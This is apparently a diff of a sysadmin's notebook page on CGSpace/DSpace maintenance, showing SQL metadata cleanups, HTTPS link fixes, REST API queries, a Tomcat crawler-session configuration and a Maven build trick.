dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;&gt;&lt;/img&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img align=&quot;left&quot; src=&quot;https://ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;https://www.ilri.org/images/email.jpg&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;', '&lt;span class=&quot;fa fa-rss fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/Iconrss2.png&quot;/&gt;%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;', '&lt;span class=&quot;fa fa-at fa-2x&quot; aria-hidden=&quot;true&quot;&gt;&lt;/span&gt;') where resource_type_id in (3,4) and text_value like '%&lt;img valign=&quot;center&quot; align=&quot;left&quot; src=&quot;http://www.ilri.org/images/email.jpg&quot;/&gt;%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;,&#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;&gt;&lt;/img&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img align=&#34;left&#34; src=&#34;https://ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;https://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-rss fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/Iconrss2.png&#34;/&gt;%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;&#39;, &#39;&lt;span class=&#34;fa fa-at fa-2x&#34; aria-hidden=&#34;true&#34;&gt;&lt;/span&gt;&#39;) where resource_type_id in (3,4) and text_value like &#39;%&lt;img valign=&#34;center&#34; align=&#34;left&#34; src=&#34;http://www.ilri.org/images/email.jpg&#34;/&gt;%&#39;;
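-- a possible consolidation (untested sketch): one pattern with the 'g' flag might cover several of the RSS icon variants at once
dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img (valign="center" )?align="left" src="https?://(www\.)?ilri\.org/images/Iconrss2\.png"(/>|></img>)', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>', 'g') where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';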
</code></pre><ul>
<li>Getting rid of these reduces the number of network requests each client makes on community/collection pages, and makes use of Font Awesome icons (which they are already loading anyways!)</li>
<li>And now that I start looking, I want to fix a bunch of links to popular sites that should be using HTTPS, like Twitter, Facebook, Google, Feed Burner, DOI, etc</li>
@ -321,9 +321,9 @@ UPDATE 0
<ul>
<li>Fix some messed up authors on CGSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='799da1d8-22f3-43f5-8233-3d2ef5ebf8a8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Charleston, B.%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;799da1d8-22f3-43f5-8233-3d2ef5ebf8a8&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Charleston, B.%&#39;;
UPDATE 10
dspace=# update metadatavalue set authority='e936f5c5-343d-4c46-aa91-7a1fff6277ed', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Knight-Jones%';
dspace=# update metadatavalue set authority=&#39;e936f5c5-343d-4c46-aa91-7a1fff6277ed&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Knight-Jones%&#39;;
UPDATE 36
</code></pre><ul>
<li>I updated the authority index but nothing seemed to change, so I&rsquo;ll wait and do it again after I update Discovery below</li>
@ -336,7 +336,7 @@ UPDATE 36
</code></pre><ul>
<li>Fix a bunch of countries in Open Refine and run the corrections on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t 'correct' -m 228 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i countries-fix-18.csv -f dc.coverage.country -t &#39;correct&#39; -m 228 -d dspace -u dspace -p fuuu
$ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -m 228 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>Run a shit ton of author fixes from Peter Ballantyne that we&rsquo;ve been cleaning up for two months:</li>
@ -345,10 +345,10 @@ $ ./delete-metadata-values.py -i countries-delete-2.csv -f dc.coverage.country -
</code></pre><ul>
<li>Run a few URL corrections for ilri.org and doi.org, etc:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://www.ilri.org','https://www.ilri.org') where resource_type_id=2 and text_value like '%http://www.ilri.org%';
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://mahider.ilri.org', 'https://cgspace.cgiar.org') where resource_type_id=2 and text_value like '%http://mahider.%.org%' and metadata_field_id not in (28);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://dx.doi.org%' and metadata_field_id not in (18,26,28,111);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://doi.org', 'https://dx.doi.org') where resource_type_id=2 and text_value like '%http://doi.org%' and metadata_field_id not in (18,26,28,111);
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://www.ilri.org&#39;,&#39;https://www.ilri.org&#39;) where resource_type_id=2 and text_value like &#39;%http://www.ilri.org%&#39;;
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://mahider.ilri.org&#39;, &#39;https://cgspace.cgiar.org&#39;) where resource_type_id=2 and text_value like &#39;%http://mahider.%.org%&#39; and metadata_field_id not in (28);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and text_value like &#39;%http://dx.doi.org%&#39; and metadata_field_id not in (18,26,28,111);
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://doi.org&#39;, &#39;https://dx.doi.org&#39;) where resource_type_id=2 and text_value like &#39;%http://doi.org%&#39; and metadata_field_id not in (18,26,28,111);
</code></pre><ul>
<li>I skipped metadata fields like citation and description</li>
</ul>

@ -26,7 +26,7 @@ Add dc.type to the output options for Atmire&rsquo;s Listings and Reports module
Add dc.type to the output options for Atmire&rsquo;s Listings and Reports module (#286)
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -160,7 +160,7 @@ java.lang.NullPointerException
<ul>
<li>Horrible one liner to get Linode ID from certain Ansible host vars:</li>
</ul>
<pre tabindex="0"><code>$ grep -A 3 contact_info * | grep -E &quot;(Orth|Sisay|Peter|Daniel|Tsega)&quot; | awk -F'-' '{print $1}' | grep linode | uniq | xargs grep linode_id
<pre tabindex="0"><code>$ grep -A 3 contact_info * | grep -E &#34;(Orth|Sisay|Peter|Daniel|Tsega)&#34; | awk -F&#39;-&#39; &#39;{print $1}&#39; | grep linode | uniq | xargs grep linode_id
</code></pre><ul>
<li>I noticed some weird CRPs in the database, and they don&rsquo;t show up in Discovery for some reason, perhaps because of the <code>:</code></li>
<li>I&rsquo;ll export these and fix them in batch:</li>
@ -170,7 +170,7 @@ COPY 22
</code></pre><ul>
<li>Test running the replacements:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/CRPs.csv -f cg.contributor.crp -t correct -m 230 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Add <code>AMR</code> to ILRI subjects and remove one duplicate instance of IITA in author affiliations controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/288">#288</a>)</li>
</ul>
@ -200,11 +200,11 @@ COPY 22
<li>Helping Megan Zandstra and CIAT with some questions about the REST API</li>
<li>Playing with <code>find-by-metadata-field</code>, this works:</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;}'
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;}&#39;
</code></pre><ul>
<li>But the results are deceiving because metadata fields can have text languages and your query must match exactly!</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
<pre tabindex="0"><code>dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39;;
text_value | text_lang
------------+-----------
SEEDS |
@ -215,23 +215,23 @@ COPY 22
<li>So basically, the text language here could be null, blank, or en_US</li>
<li>To query metadata with these properties, you can do:</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;}' | jq length
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;}&#39; | jq length
55
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;, &quot;language&quot;:&quot;&quot;}' | jq length
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;, &#34;language&#34;:&#34;&#34;}&#39; | jq length
34
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;, &quot;language&quot;:&quot;en_US&quot;}' | jq length
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;, &#34;language&#34;:&#34;en_US&#34;}&#39; | jq length
</code></pre><ul>
<li>The results (55+34=89) don&rsquo;t seem to match those from the database:</li>
</ul>
<pre tabindex="0"><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang is null;
<pre tabindex="0"><code>dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39; and text_lang is null;
count
-------
15
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='';
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39; and text_lang=&#39;&#39;;
count
-------
4
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS' and text_lang='en_US';
dspace=# select count(text_value) from metadatavalue where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39; and text_lang=&#39;en_US&#39;;
count
-------
66
@ -267,27 +267,27 @@ COPY 14
</code></pre><ul>
<li>Perhaps we need to fix them all in batch, or experiment with fixing only certain metadatavalues:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang='en_US' where resource_type_id=2 and metadata_field_id=203 and text_value='SEEDS';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;SEEDS&#39;;
UPDATE 85
</code></pre><ul>
<li>The <code>fix-metadata.py</code> script I have is meant for specific metadata values, so if I want to update some <code>text_lang</code> values I should just do it directly in the database</li>
<li>For example, on a limited set:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value='LIVESTOCK' and text_lang='';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=NULL where resource_type_id=2 and metadata_field_id=203 and text_value=&#39;LIVESTOCK&#39; and text_lang=&#39;&#39;;
UPDATE 420
</code></pre><ul>
<li>And assuming I want to do it for all fields:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang='';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_lang=NULL where resource_type_id=2 and text_lang=&#39;&#39;;
UPDATE 183726
</code></pre><ul>
<li>After that I restarted Tomcat and PostgreSQL (because I&rsquo;m superstitious about caches) and now I see the following in the REST API query:</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;}' | jq length
<pre tabindex="0"><code>$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;}&#39; | jq length
71
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;, &quot;language&quot;:&quot;&quot;}' | jq length
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;, &#34;language&#34;:&#34;&#34;}&#39; | jq length
0
$ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: application/json&quot; -X POST &quot;http://localhost:8080/rest/items/find-by-metadata-field&quot; -d '{&quot;key&quot;: &quot;cg.subject.ilri&quot;,&quot;value&quot;: &quot;SEEDS&quot;, &quot;language&quot;:&quot;en_US&quot;}' | jq length
$ curl -s -H &#34;accept: application/json&#34; -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;: &#34;cg.subject.ilri&#34;,&#34;value&#34;: &#34;SEEDS&#34;, &#34;language&#34;:&#34;en_US&#34;}&#39; | jq length
</code></pre><ul>
<li>Not sure what&rsquo;s going on, but Discovery shows 83 values and the database shows 85, so I&rsquo;m going to reindex Discovery just in case</li>
</ul>
@ -298,7 +298,7 @@ $ curl -s -H &quot;accept: application/json&quot; -H &quot;Content-Type: applica
<li>So there is apparently this Tomcat native way to limit web crawlers to one session: <a href="https://tomcat.apache.org/tomcat-7.0-doc/config/valve.html#Crawler_Session_Manager_Valve">Crawler Session Manager</a></li>
<li>After adding that to <code>server.xml</code>, bots matching the pattern in the configuration will all use ONE session, just like normal users:</li>
</ul>
<pre tabindex="0"><code>$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
<pre tabindex="0"><code>$ http --print h https://dspacetest.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#39;
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@ -312,7 +312,7 @@ Vary: Accept-Encoding
X-Cocoon-Version: 2.2.0
X-Robots-Tag: none
$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
$ http --print h https://dspacetest.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#39;
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@ -336,7 +336,7 @@ X-Cocoon-Version: 2.2.0
<ul>
<li>Seems the default regex doesn&rsquo;t catch Baidu, though:</li>
</ul>
<pre tabindex="0"><code>$ http --print h https://dspacetest.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
<pre tabindex="0"><code>$ http --print h https://dspacetest.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@ -349,7 +349,7 @@ Transfer-Encoding: chunked
Vary: Accept-Encoding
X-Cocoon-Version: 2.2.0
$ http --print h https://dspacetest.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@ -365,17 +365,17 @@ X-Cocoon-Version: 2.2.0
<li>Adding Baiduspider to the list of user agents seems to work, and the final configuration should be:</li>
</ul>
<pre tabindex="0"><code>&lt;!-- Crawler Session Manager Valve helps mitigate damage done by web crawlers --&gt;
&lt;Valve className=&quot;org.apache.catalina.valves.CrawlerSessionManagerValve&quot;
crawlerUserAgents=&quot;.*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*&quot; /&gt;
&lt;Valve className=&#34;org.apache.catalina.valves.CrawlerSessionManagerValve&#34;
crawlerUserAgents=&#34;.*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*Baiduspider.*&#34; /&gt;
</code></pre><ul>
<li>Looking at the bots that were active yesterday it seems the above regex should be sufficient:</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'Mozilla/5\.0 \(compatible;.*\&quot;' /var/log/nginx/access.log | sort | uniq
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&quot; &quot;-&quot;
Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)&quot; &quot;-&quot;
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&quot; &quot;-&quot;
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&quot; &quot;-&quot;
Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)&quot; &quot;-&quot;
<pre tabindex="0"><code>$ grep -o -E &#39;Mozilla/5\.0 \(compatible;.*\&#34;&#39; /var/log/nginx/access.log | sort | uniq
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#34; &#34;-&#34;
Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)&#34; &#34;-&#34;
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#34; &#34;-&#34;
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#34; &#34;-&#34;
Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)&#34; &#34;-&#34;
</code></pre><ul>
<li>Neat Maven trick to exclude some modules from being built (a sketch follows below):</li>
</ul>
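<pre tabindex="0"><code># a sketch from memory, not the exact command we used: Maven profiles named
# after the modules (names assumed here) can be deactivated with a leading !
# so those modules are skipped during the build
$ mvn -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2 clean package
</code></pre>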
@ -393,9 +393,9 @@ COPY 2515
<li>Send a message to users of the CGSpace REST API to notify them of the upcoming upgrade so they can test their apps against DSpace Test</li>
<li>Test an update of old, non-HTTPS links to the CCAFS website in CGSpace metadata:</li>
</ul>
